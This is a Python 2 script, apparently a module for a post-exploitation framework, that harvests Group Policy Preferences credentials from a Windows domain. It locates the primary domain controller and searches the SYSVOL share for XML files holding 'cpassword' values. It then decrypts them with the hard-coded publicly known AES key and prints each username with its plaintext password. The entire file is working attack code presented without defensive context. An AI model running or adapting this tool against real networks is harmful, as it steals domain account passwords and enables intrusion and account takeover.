61 lines
No EOL
2.3 KiB
Python
61 lines
No EOL
2.3 KiB
Python
|
|
import ops.cmd
|
|
import dsz.version, dsz.path, dsz.control, dsz.lp
|
|
import sys
|
|
from xml.dom import minidom
|
|
|
|
def main():
|
|
found = False
|
|
dcName = ''
|
|
domainName = ''
|
|
try:
|
|
myCommand = ops.cmd.getDszCommand('domaincontroller -primary')
|
|
cmdRes = myCommand.execute()
|
|
dcName = cmdRes.domaincontroller[0].dcname
|
|
domainName = cmdRes.domaincontroller[0].domainname
|
|
ops.info(('The dc is %s for %s' % (dcName, domainName)))
|
|
except:
|
|
ops.error('This machine does not appear to be part of the domain')
|
|
quit()
|
|
sharePath = ('SYSVOL\\' + domainName)
|
|
fullShare = ((dcName + '\\') + sharePath)
|
|
myCommand = ops.cmd.DszCommand('grep', pattern='cpassword', path=fullShare, mask='*xml', recursive=True)
|
|
cmdRes = myCommand.execute()
|
|
for xmlfile in cmdRes.file:
|
|
if xmlfile.line:
|
|
for ret_value in xmlfile.line:
|
|
if ('cpassword' in ret_value.value):
|
|
found = True
|
|
parsexml(ret_value.value)
|
|
if (not found):
|
|
ops.info('Failed to find any .xml files in sysvol with creds stored')
|
|
|
|
def decrypt(encpass):
|
|
sys.path.append('C:\\python27\\lib\\site-packages')
|
|
import Crypto.Cipher.AES, codecs
|
|
dc = codecs.getdecoder('Base64')
|
|
mod = ((4 - (len(encpass[0]) % 4)) % 4)
|
|
if (not (mod == 0)):
|
|
encpass += ('=' * mod)
|
|
decode_encpass = dc(encpass)
|
|
AESKey = 'N\x99\x06\xe8\xfc\xb6l\xc9\xfa\xf4\x93\x10b\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05y\x90 \x9b\t\xa43\xb6l\x1b'
|
|
try:
|
|
test = Crypto.Cipher.AES.new(AESKey, Crypto.Cipher.AES.MODE_CBC, ('\x00' * Crypto.Cipher.AES.block_size))
|
|
res = test.decrypt(decode_encpass[0])
|
|
except Exception as e:
|
|
ops.error(e)
|
|
quit()
|
|
clean_res = res.strip('\x10').replace('\x00', '')
|
|
return clean_res
|
|
|
|
def parsexml(xmlstring):
|
|
data = minidom.parseString(xmlstring)
|
|
userdata = data.getElementsByTagName('User')
|
|
properties = data.getElementsByTagName('Properties')
|
|
for i in xrange(0, len(userdata)):
|
|
name = userdata[i].getAttribute('name')
|
|
cpassword = properties[i].getAttribute('cpassword')
|
|
decpassword = decrypt(cpassword)
|
|
ops.info(('Name: %s\tPassword: %s' % (name, decpassword)))
|
|
if (__name__ == '__main__'):
|
|
main() |